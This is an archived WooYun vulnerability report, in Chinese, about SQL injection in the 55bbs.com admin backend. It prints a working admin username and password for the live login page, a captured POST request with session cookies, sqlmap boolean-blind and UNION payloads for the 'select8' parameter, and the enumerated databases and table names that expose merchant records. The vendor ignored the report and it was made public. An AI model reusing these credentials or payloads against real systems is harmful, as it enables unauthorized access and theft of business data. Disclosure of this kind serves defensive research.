我爱网某站弱口令后台注入涉及商家信息泄漏（支持union）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128409

漏洞标题：我爱网某站弱口令后台注入涉及商家信息泄漏（支持union）

漏洞作者：路人甲

提交时间：2015-07-23 10:16

修复时间：2015-07-28 10:18

公开时间：2015-07-28 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-23：细节已通知厂商并且等待厂商处理中
2015-07-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

后台地址

http://admin.55bbs.com/login.php

弱口令 lijun lijun123直接进去
后台一个搜索处抓包

POST /adpublish/customer_list.php HTTP/1.1
Host: article.55bbs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://article.55bbs.com/adpublish/customer_list.php
Cookie: ID=320; S_uid=lijun; S_checkcode=c7c0d53884ee86346f5dc0d9d27b7e5e; S_power_limit=N
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
text=&workname=nixiaolei&select8=1&button=%B2%E9%D1%AF

经测试参数select8为注入点。
直接丢sqlmap

Parameter: select8 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: text=&workname=nixiaolei&select8=1 AND 7097=7097&button=%B2%E9%D1%AF
    Type: UNION query
    Title: MySQL UNION query (33) - 11 columns
    Payload: text=&workname=nixiaolei&select8=1 UNION ALL SELECT 33,33,33,33,CONCAT(0x716b627a71,0x48654a5270764e595443,0x717a786a71),33,33,33,33,33,33#&button=%B2%E9%D1%AF
---
[16:37:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5

有3个库。

available databases [3]:
[*] Admanger
[*] information_schema
[*] test

漏洞证明：

表挺多的，有429张。其中也有一些商家的重要信息。

Database: Admanger
[429 tables]
+-----------------------------+
| 55_bao10_3phplog            |
| 55_bao10_7_4                |
| 55_bao10_accesslog          |
| 55_bao10                    |
| tbl_chuangyi1-2             |
| activity                    |
| activity_0                  |
| activity_122                |
| activity_140                |
| activity_144                |
| activity_145                |
| activity_146                |
| activity_163                |
| activity_164                |
| activity_165                |
| activity_166                |
| activity_167                |
| activity_168                |
| activity_169                |
| activity_170                |
| activity_171                |
| activity_172                |
| activity_173                |
| activity_178                |
| activity_180                |
| activity_181                |
| activity_183                |
| activity_184                |
| activity_185                |
| activity_186                |
| activity_187                |
| activity_189                |
| activity_190                |
| activity_191                |
| activity_192                |
| activity_193                |
| activity_194                |
| activity_196                |
| activity_197                |
| activity_198                |
| activity_199                |
| activity_200                |
| activity_201                |
| activity_202                |
| activity_203                |
| activity_204                |
| activity_205                |
| activity_206                |
| activity_207                |
| activity_208                |
| activity_210                |
| activity_211                |
| activity_212                |
| activity_213                |
| activity_214                |
| activity_215                |
| activity_216                |
| activity_217                |
| activity_218                |
| activity_219                |
| activity_220                |
| activity_221                |
| activity_222                |
| activity_223                |
| activity_225                |
| activity_226                |
| activity_227                |
| activity_228                |
| activity_229                |
| activity_230                |
| activity_231                |
| activity_232                |
| activity_233                |
| activity_237                |
| activity_238                |
| activity_239                |
| activity_240                |
| activity_241                |
| activity_242                |
| activity_243                |
| activity_244                |
| activity_245                |
| activity_246                |
| activity_247                |
| activity_248                |
| activity_249                |
| activity_250                |
| activity_251                |
| activity_252                |
| activity_253                |
| activity_254                |
| activity_255                |
| activity_256                |
| activity_257                |
| activity_258                |
| activity_259                |
| activity_260                |
| activity_261                |
| activity_262                |
| activity_263                |
| activity_264                |
| activity_265                |
| activity_266                |
| activity_267                |
| activity_268                |
| activity_269                |
| activity_270                |
| activity_271                |
| activity_272                |
| activity_273                |
| activity_274                |
| activity_275                |
| activity_276                |
| activity_277                |
| activity_278                |
| activity_279                |
| activity_280                |
| activity_281                |
| activity_282                |
| activity_283                |
| activity_284                |
| activity_285                |
| activity_286                |
| activity_287                |
| activity_288                |
| activity_289                |
| activity_290                |
| activity_291                |
| activity_292                |
| activity_292_vote           |
| activity_293                |
| activity_294                |
| activity_295                |
| activity_296                |
| activity_297                |
| activity_298                |
| activity_299                |
| activity_300                |
| activity_301                |
| activity_302                |
| activity_303                |
| activity_304                |
| activity_305                |
| activity_306                |
| activity_307                |
| activity_308                |
| activity_309                |
| activity_310                |
| activity_311                |
| activity_312                |
| activity_313                |
| activity_314                |
| activity_315                |
| activity_316                |
| activity_317                |
| activity_318                |
| activity_319                |
| activity_320                |
| activity_321                |
| activity_322                |
| activity_323                |
| activity_324                |
| activity_325                |
| activity_326                |
| activity_327                |
| activity_328                |
| activity_329                |
| activity_330                |
| activity_331                |
| activity_332                |
| activity_333                |
| activity_334                |
| activity_335                |
| activity_336                |
| activity_337                |
| activity_338                |
| activity_339                |
| activity_340                |
| activity_344                |
| activity_345                |
| activity_346                |
| activity_347                |
| activity_348                |
| activity_349                |
| activity_350                |
| activity_351                |
| activity_352                |
| activity_353                |
| activity_354                |
| activity_355                |
| activity_356                |
| activity_357                |
| activity_358                |
| activity_359                |
| activity_360                |
| activity_361                |
| activity_362                |
| activity_363                |
| activity_364                |
| activity_365                |
| activity_366                |
| activity_368                |
| activity_369                |
| activity_371                |
| activity_372                |
| activity_373                |
| activity_374                |
| activity_375                |
| activity_376                |
| activity_377                |
| activity_378                |
| activity_379                |
| activity_380                |
| activity_381                |
| activity_382                |
| activity_383                |
| activity_384                |
| activity_385                |
| activity_386                |
| activity_387                |
| activity_388                |
| activity_389                |
| activity_390                |
| activity_391                |
| activity_392                |
| activity_393                |
| activity_394                |
| activity_395                |
| activity_396                |
| activity_397                |
| activity_398                |
| activity_399                |
| activity_400                |
| activity_401                |
| activity_402                |
| activity_403                |
| activity_404                |
| activity_405                |
| activity_406                |
| activity_407                |
| activity_408                |
| activity_409                |
| activity_410                |
| activity_411                |
| activity_412                |
| activity_413                |
| activity_414                |
| activity_415                |
| activity_416                |
| activity_417                |
| activity_418                |
| activity_419                |
| activity_420                |
| activity_421                |
| activity_422                |
| activity_423                |
| activity_424                |
| activity_425                |
| activity_426                |
| activity_427                |
| activity_428                |
| activity_429                |
| activity_430                |
| activity_431                |
| activity_432                |
| activity_433                |
| activity_434                |
| activity_435                |
| activity_436                |
| activity_437                |
| activity_438                |
| activity_439                |
| activity_440                |
| activity_440_secode         |
| activity_441                |
| activity_442                |
| activity_450                |
| activity_451                |
| activity_452                |
| activity_453                |
| activity_454                |
| activity_455                |
| activity_456                |
| activity_457                |
| activity_458                |
| activity_459                |
| activity_460                |
| activity_461                |
| activity_462                |
| activity_463                |
| activity_464                |
| activity_465                |
| activity_466                |
| activity_467                |
| activity_468                |
| activity_469                |
| activity_470                |
| activity_471                |
| activity_472                |
| activity_473                |
| activity_474                |
| activity_475                |
| activity_476                |
| activity_477                |
| activity_478                |
| activity_479                |
| activity_480                |
| activity_481                |
| activity_482                |
| activity_483                |
| activity_484                |
| activity_485                |
| activity_486                |
| activity_487                |
| activity_488                |
| activity_489                |
| activity_490                |
| activity_491                |
| activity_492                |
| activity_493                |
| activity_494                |
| activity_495                |
| activity_498                |
| activity_499                |
| activity_500                |
| activity_501                |
| activity_502                |
| activity_503                |
| activity_504                |
| activity_505                |
| activity_506                |
| activity_507                |
| activity_508                |
| activity_509                |
| activity_510                |
| activity_511                |
| activity_512                |
| activity_513                |
| activity_514                |
| activity_515                |
| activity_516                |
| activity_517                |
| activity_518                |
| activity_519                |
| activity_520                |
| activity_521                |
| activity_522                |
| activity_523                |
| activity_524                |
| activity_525                |
| activity_526                |
| activity_527                |
| activity_528                |
| activity_529                |
| activity_530                |
| activity_531                |
| activity_532                |
| activity_533                |
| activity_534                |
| activity_535                |
| activity_536                |
| activity_537                |
| activity_538                |
| activity_539                |
| activity_540                |
| activity_541                |
| activity_542                |
| activity_543                |
| activity_544                |
| activity_egg                |
| activity_panting            |
| activity_photo_396          |
| activity_photo_399          |
| bride_album                 |
| bride_photos                |
| bride_vote                  |
| bwxn                        |
| bwxn_code                   |
| eanhk_sn                    |
| info_param                  |
| ip_tj                       |
| jiehun_act                  |
| m_activities                |
| m_albums                    |
| m_ip_logs                   |
| m_photos                    |
| mnls_userinfo               |
| param_dict                  |
| qmshangwang                 |
| qmshangwang_tids            |
| qmshangwang_users           |
| saiban_photo                |
| saiban_userinfo             |
| sunny_396                   |
| sunny_vote                  |
| supe_categories             |
| tbl_adclass                 |
| tbl_adgrand_subclass        |
| tbl_admodus                 |
| tbl_adplan                  |
| tbl_adplan_log              |
| tbl_adplan_tmp              |
| tbl_adsite                  |
| tbl_adsite_100416           |
| tbl_adsite_cdbADV           |
| tbl_adsite_cdbADV_010416    |
| tbl_adsubclass              |
| tbl_chuangyi                |
| tbl_chuangyi2               |
| tbl_classes_fid             |
| tbl_corp_rel                |
| tbl_customer_info           |
| tbl_div                     |
| tbl_module                  |
| tbl_publish                 |
| tbl_publish2                |
| tbl_publish2_bak            |
| tbl_publish2_bak_100127_zzq |
| tbl_publish_bak20100127     |
| tbl_relation                |
| tbl_solution                |
| tbl_solution_log            |
| tbl_tid_fid                 |
| tbl_tongji                  |
| tbl_tongji_hour             |
| user_20101002               |
| userinfo                    |
| wizard_userinfo             |
| wizard_vote                 |
+-----------------------------+

修复方案：

-。-

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-28 10:18

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128409

漏洞标题：我爱网某站弱口令后台注入涉及商家信息泄漏（支持union）

相关厂商：55bbs.com

漏洞作者：路人甲

提交时间：2015-07-23 10:16

修复时间：2015-07-28 10:18

公开时间：2015-07-28 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0128409

漏洞标题：我爱网某站弱口令后台注入涉及商家信息泄漏（支持union）

相关厂商：55bbs.com

漏洞作者： 路人甲

提交时间：2015-07-23 10:16

修复时间：2015-07-28 10:18

公开时间：2015-07-28 10:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0128409"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云